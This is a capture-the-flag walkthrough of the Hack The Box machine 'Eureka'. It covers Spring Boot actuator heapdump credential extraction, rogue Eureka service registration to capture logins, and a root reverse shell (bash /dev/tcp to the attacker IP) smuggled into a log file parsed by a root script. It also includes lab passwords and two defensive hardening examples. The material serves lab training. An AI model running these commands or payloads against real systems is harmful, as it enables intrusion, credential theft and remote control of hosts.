# Eureka

<figure><img src="/files/ssXFWSC9YDyHPzICeBqg" alt=""><figcaption></figcaption></figure>

## Recon

Using the Scripts/Functions/Tools:

{% code title="nmap -sCV -T4 <ip> -oA <file>" overflow="wrap" %}

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d6:b2:10:42:32:35:4d:c9:ae:bd:3f:1f:58:65:ce:49 (RSA)
|   256 90:11:9d:67:b6:f6:64:d4:df:7f:ed:4a:90:2e:6d:7b (ECDSA)
|_  256 94:37:d3:42:95:5d:ad:f7:79:73:a6:37:94:45:ad:47 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://furni.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

{% endcode %}

Adding new hosts

{% code title="etc/hosts entry" overflow="wrap" %}

```
10.129.242.192 eureka.htb furni.htb
```

{% endcode %}

### Furni-Website

<figure><img src="/files/J24nn5bAWncH9uC7ywNB" alt=""><figcaption></figcaption></figure>

```
➜  eureka dirsearch -u http://furni.htb/ -e php,html,txt -t 50                                                                                                                                                                             
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html                                                           
  from pkg_resources import DistributionNotFound, VersionConflict                                                                                                                                                                          
                                                                                                                                                                                                                                           
  _|. _ _  _  _  _ _|_    v0.4.3                                                                                                                                                                                                           
 (_||| _) (/_(_|| (_| )                                                                                                                                                                                                                    
                                                                                                                                                                                                                                           
Extensions: php, html, txt | HTTP method: GET | Threads: 50 | Wordlist size: 10403                                                                                                                                                         
                                                                                                                                                                                                                                           
Output File: /mnt/e/hacking/hackthebox/Machines/eureka/reports/http_furni.htb/__25-04-27_22-17-19.txt                                                                                                                                      
                                                                                                                     
Target: http://furni.htb/                                                                                            
                                                                                                                     
[22:17:19] Starting:                       
[...]
[22:17:27] 200 -    2KB - /actuator                        
[22:17:27] 400 -  105B  - /actuator/;/sso                  
[22:17:27] 400 -  115B  - /actuator/;/springWebflow
[22:17:27] 400 -  112B  - /actuator/;/statistics
[22:17:27] 400 -  113B  - /actuator/;/ssoSessions
[22:17:27] 400 -  108B  - /actuator/;/status
[22:17:27] 400 -  112B  - /actuator/;/threaddump
[22:17:27] 400 -  107B  - /actuator/;/trace
[22:17:27] 200 -   20B  - /actuator/caches                 
[22:17:27] 200 -    6KB - /actuator/env                    
[22:17:27] 200 -    2B  - /actuator/info                   
[22:17:27] 200 -  467B  - /actuator/features
[22:17:27] 200 -   76MB - /actuator/heapdump
[22:17:27] 200 -    3KB - /actuator/metrics                
[22:17:27] 200 -   54B  - /actuator/scheduledtasks
[22:17:28] 200 -  198KB - /actuator/beans                  
[22:17:28] 400 -  108B  - /actuator/sessions               
[22:17:28] 405 -  114B  - /actuator/refresh                
[22:17:28] 200 -   96KB - /actuator/loggers                
[22:17:29] 200 -   15B  - /actuator/health                 
[22:17:29] 200 -   35KB - /actuator/mappings               
[22:17:29] 200 -  180KB - /actuator/conditions             
[22:17:29] 400 -  106B  - /admin/%3bindex/
[22:17:30] 200 -  824KB - /actuator/threaddump             
[22:17:30] 400 -   98B  - /admin;/                         
[22:17:31] 400 -   98B  - /Admin;/                         
[22:17:31] 200 -   36KB - /actuator/configprops     
[...]
```

Information leaks because of misconfigured Spring Boot Actuators:

<http://furni.htb/actuator/env>

Checking a list of common entry points:

```
/actuator/env
/actuator/auditevents
/actuator/beans
/actuator/caches
/actuator/configprops
/actuator/flyway
/actuator/health
/actuator/heapdump
/actuator/httptrace
/actuator/info
/actuator/integrationgraph
/actuator/liquibase
/actuator/configprops
/actuator/shutdown
```

We find a heap dump at <http://furni.htb/actuator/heapdump>.
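To review scan output like the one above from the defending side, the following added example (not part of the original write-up) filters lines in that `[time] status - size - path` format down to the actuator endpoints that answered 200 and can disclose secrets or internals. The `SENSITIVE` list, the function names and the sample lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: triage scanner output for actuator endpoints answering 200.
# SENSITIVE is an assumed review list, not something taken from the page.
SENSITIVE="heapdump env configprops threaddump beans mappings loggers"

# Constructed sample in the "[time] status - size - path" format shown above.
sample_scan() {
cat <<'EOF'
[22:17:27] 200 -    2KB - /actuator
[22:17:27] 400 -  112B  - /actuator/;/threaddump
[22:17:27] 200 -    6KB - /actuator/env
[22:17:27] 200 -   76MB - /actuator/heapdump
[22:17:28] 405 -  114B  - /actuator/refresh
[22:17:29] 200 -   15B  - /actuator/health
[22:17:30] 200 -  824KB - /actuator/threaddump
EOF
}

# Read scan lines on stdin; print "endpoint size" for every sensitive
# endpoint that returned 200. Other statuses and ";/" probes are ignored.
exposed_actuators() {
    awk -v list="$SENSITIVE" '
        BEGIN { n = split(list, a, " "); for (i = 1; i <= n; i++) want[a[i]] = 1 }
        $2 == 200 {
            path = $NF
            if (path !~ /^\/actuator\/[A-Za-z]+$/) next
            name = substr(path, length("/actuator/") + 1)
            if (name in want) print name, $4
        }'
}

sample_scan | exposed_actuators
```

Anything this prints should be dropped from `management.endpoints.web.exposure.include` or placed behind authentication.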

Using a script written with the help of ChatGPT, we find a password:

```
#!/bin/bash

# Usage check
if [ $# -lt 1 ]; then
    echo "Usage: $0 <heapdump-file>"
    exit 1
fi

HEAPDUMP="$1"
OUTPUT="sensitive_findings.txt"

# Colors
RED='\033[1;31m'
GREEN='\033[1;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

echo "[*] Extracting and searching in $HEAPDUMP..."
# Start with an empty results file (no stray blank line that would skew the count)
: > "$OUTPUT"

# Search for sensitive patterns and store the matches.
# The original line was cut off after "sess" by the editor view; the last
# alternative is completed as "session" and the output is written to $OUTPUT.
strings "$HEAPDUMP" | grep -Ei 'password[ =:][^[:space:]]+|passwd[ =:][^[:space:]]+|pwd[ =:][^[:space:]]+|secret[ =:][^[:space:]]+|token[ =:][^[:space:]]+|key[ =:][^[:space:]]+|credential[ =:][^[:space:]]+|auth[ =:][^[:space:]]+|session[ =:][^[:space:]]+' >> "$OUTPUT"

echo "[*] Search completed! Found $(wc -l < "$OUTPUT") potential sensitive items."
echo

# Pretty print
while IFS= read -r line; do
    if echo "$line" | grep -iq 'password\|passwd\|pwd'; then
        echo -e "${RED}[PASSWORD FOUND]${NC} ${YELLOW}${line}${NC}"
    elif echo "$line" | grep -iq 'secret\|token\|key\|credential\|auth\|session'; then
        echo -e "${GREEN}[TOKEN/SECRET FOUND]${NC} ${YELLOW}${line}${NC}"
    elif echo "$line" | grep -qE 'AKIA[0-9A-Z]{16}|ASIA[0-9A-Z]{16}'; then
        echo -e "${GREEN}[AWS KEY FOUND]${NC} ${YELLOW}${line}${NC}"
    elif echo "$line" | grep -qE '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}'; then
        echo -e "${GREEN}[EMAIL FOUND]${NC} ${YELLOW}${line}${NC}"
    elif echo "$line" | grep -qE '([0-9]{4}[- ]?){3}[0-9]{4}'; then
        echo -e "${GREEN}[CREDIT CARD?]${NC} ${YELLOW}${line}${NC}"
    else
        echo -e "${YELLOW}[OTHER]${NC} $line"
    fi
done < "$OUTPUT"

echo
echo "[*] Full results also saved in: $OUTPUT"
```

```
[..]
[PASSWORD FOUND] {password=0sc@r190_S0l!dP@sswd, user=oscar190}!,    
[..]
```

## User

```
➜  eureka ssh oscar190@furni.htb
oscar190@furni.htb's password: 0sc@r190_S0l!dP@sswd
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-214-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun 27 Apr 2025 09:00:04 PM UTC

  System load:           0.0
  Usage of /:            63.8% of 6.79GB
  Memory usage:          47%
  Swap usage:            0%
  Processes:             244
  Users logged in:       0
  IPv4 address for eth0: 10.129.182.126
  IPv6 address for eth0: dead:beef::250:56ff:fe94:4834


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

2 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


Last login: Sun Apr 27 21:00:06 2025 from 10.10.14.71
oscar190@eureka:~$ 

```

We find another password in the `application.yaml` of the Eureka server:

```
oscar190@eureka:/var/www/web/Eureka-Server$ grep -Ei -C 5 'password|secret|api[_-]?key|token' ./target/classes/application.yaml 
    name: "Eureka Server"

  security:
    user:
      name: EurekaSrvr
      password: 0scarPWDisTheB3st

server:
  port: 8761
  address: 0.0.0.0

```

### nmap-full-scan

The full scan shows the other HTTP server, Eureka, on port 8761, as also seen in the command output above.

<figure><img src="/files/qVl6IL49rCl1nPs40r7t" alt=""><figcaption></figcaption></figure>

### Eureka-Server

Using these credentials we can log in:

<figure><img src="/files/CAXOukRHVUgqB2bIIWIJ" alt=""><figcaption></figcaption></figure>

Create a new fake service, using [Hacking Netflix Eureka](https://medium.com/@mfocuz/hacking-netflix-eureka-8e5957b2f539) as an example:

{% code title="Change YOURIP" overflow="wrap" %}

```
curl -X POST http://EurekaSrvr:0scarPWDisTheB3st@furni.htb:8761/eureka/apps/USER-MANAGEMENT-SERVICE -H 'Content-Type: application/json' -d '{
  "instance": {
    "instanceId": "USER-MANAGEMENT-SERVICE",
    "hostName": "YOURIP",  
    "app": "USER-MANAGEMENT-SERVICE",
    "ipAddr": "YOURIP",
    "vipAddress": "USER-MANAGEMENT-SERVICE",
    "secureVipAddress": "USER-MANAGEMENT-SERVICE",
    "status": "UP",
    "port": { "$": 8081, "@enabled": "true" },
    "dataCenterInfo": {
      "@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
      "name": "MyOwn"
    }
  }
}'
```

{% endcode %}

After some time we get the username and password on our listener:

```
➜  eureka rlwrap nc -nlvp 8081
listening on [any] 8081 ...
connect to [10.10.14.71] from (UNKNOWN) [10.129.16.221] 50338
POST /login HTTP/1.1
X-Real-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1,127.0.0.1
X-Forwarded-Proto: http,http
Content-Length: 168
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Cookie: SESSION=NTI4MDg3OTgtM2E3MS00ZmE0LWFkYmQtYjQ1NWRlMjM4NDdj
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
Forwarded: proto=http;host=furni.htb;for="127.0.0.1:56148"
X-Forwarded-Port: 80
X-Forwarded-Host: furni.htb
host: 10.10.14.71:8081
username=miranda.wise%40furni.htb&password=IL%21veT0Be%26BeT0L0ve&_csrf=BDpsWbgK9mVLFJVx5FuxOvZT2DfbiKCuM7CjmcVRPi8gMtPBNwpbOoBrwwRmJfBBhnaFA8My9VbqvJKDAoKUoadmD04YULD3ls


```

URL-decoding the password with [CyberChef](https://gchq.github.io/CyberChef/#recipe=URL_Decode\(\)\&input=SUwlMjF2ZVQwQmUlMjZCZVQwTDB2ZQ), we can log in and get the user flag:

```
➜  eureka ssh miranda-wise@furni.htb
miranda-wise@furni.htb's password: IL!veT0Be&BeT0L0ve
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-214-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Thu 10 Apr 2025 07:41:57 AM UTC

  System load:           0.04
  Usage of /:            84.1% of 8.02GB
  Memory usage:          44%
  Swap usage:            0%
  Processes:             248
  Users logged in:       1
  IPv4 address for eth0: 10.129.232.19
  IPv6 address for eth0: dead:beef::250:56ff:feb9:f97


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

2 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Apr 28 16:17:19 2025 from 10.10.14.71
miranda-wise@eureka:~$ 

```

## Root

Checking for processes running with root privileges shows us a log\_analyse.sh:

```
ps -eo user,pid,comm | grep '^root'
[..]
root     4105259 log_analyse.sh
root     4105350 log_analyse.sh


```

Searching for log\_analyse.sh:

```
miranda-wise@eureka:/$ find . -name log_analyse.sh                                                                                                                                                                                         
find: ‘./boot/lost+found’: Permission denied                                                                                                                                                                                               
find: ‘./var/tmp/systemd-private-83645e554a1047198652b4
[..]
./opt/log_analyse.sh 
```

In that file at analyze\_http\_statuses() we can

```
code=$(echo "$line" | grep -oP 'Status: \K.*')
```

{% code overflow="wrap" %}

```
miranda-wise@eureka:~$ rm -f /var/www/web/user-management-service/log/application.log
miranda-wise@eureka:~$ echo 'HTTP Status: x[$(/bin/bash -i >& /dev/tcp/10.10.14.71/1337 0>&1)]' > /var/www/web/user-management-service/log/application.log
```

{% endcode %}

```
➜  eureka rlwrap nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.71] from (UNKNOWN) [10.129.16.221] 41958
bash: cannot set terminal process group (1726439): Inappropriate ioctl for device
bash: no job control in this shell
root@eureka:~# 
```
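A hardened form of the `code=$(...)` extraction shown above, as an added example that is not the script from the box. It assumes the extracted value later reaches a bash numeric test such as `[[ "$code" -eq 200 ]]`, where bash evaluates the operand as an arithmetic expression, so the value is accepted only when it is exactly three digits. Function names and sample lines are constructed.

```shell
#!/bin/sh
# Added example: validate the status field before any numeric use.
# Function names and sample lines are constructed for illustration.

# Take the text after "Status: " and accept it only if it is exactly three
# digits. Prints the code and returns 0, otherwise returns 1.
extract_status() {
    line=$1
    case $line in
        *"Status: "*) code=${line#*Status: } ;;
        *) return 1 ;;
    esac
    case $code in
        [0-9][0-9][0-9]) printf '%s\n' "$code" ;;
        *) return 1 ;;
    esac
}

# Summarise log lines on stdin. Rejected values are counted, never evaluated.
summarise_statuses() {
    ok=0 failed=0 rejected=0
    while IFS= read -r line; do
        case $line in *"Status: "*) ;; *) continue ;; esac
        if code=$(extract_status "$line"); then
            if [ "$code" -ge 200 ] && [ "$code" -lt 400 ]; then
                ok=$((ok + 1))
            else
                failed=$((failed + 1))
            fi
        else
            rejected=$((rejected + 1))
        fi
    done
    printf 'ok=%s failed=%s rejected=%s\n' "$ok" "$failed" "$rejected"
}

# Constructed sample, including a line shaped like the application.log entry above.
sample_log() {
cat <<'EOF'
2025-04-09 INFO  HTTP Status: 200
2025-04-09 WARN  HTTP Status: 404
2025-04-09 INFO  session started
HTTP Status: x[$(echo evaluated >&2)]
HTTP Status: 200 OK
EOF
}

sample_log | summarise_statuses
```

Because a log file is writable by less-privileged accounts than the root job that reads it, every field taken from it has to be treated as untrusted input, and rejected lines are worth alerting on.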


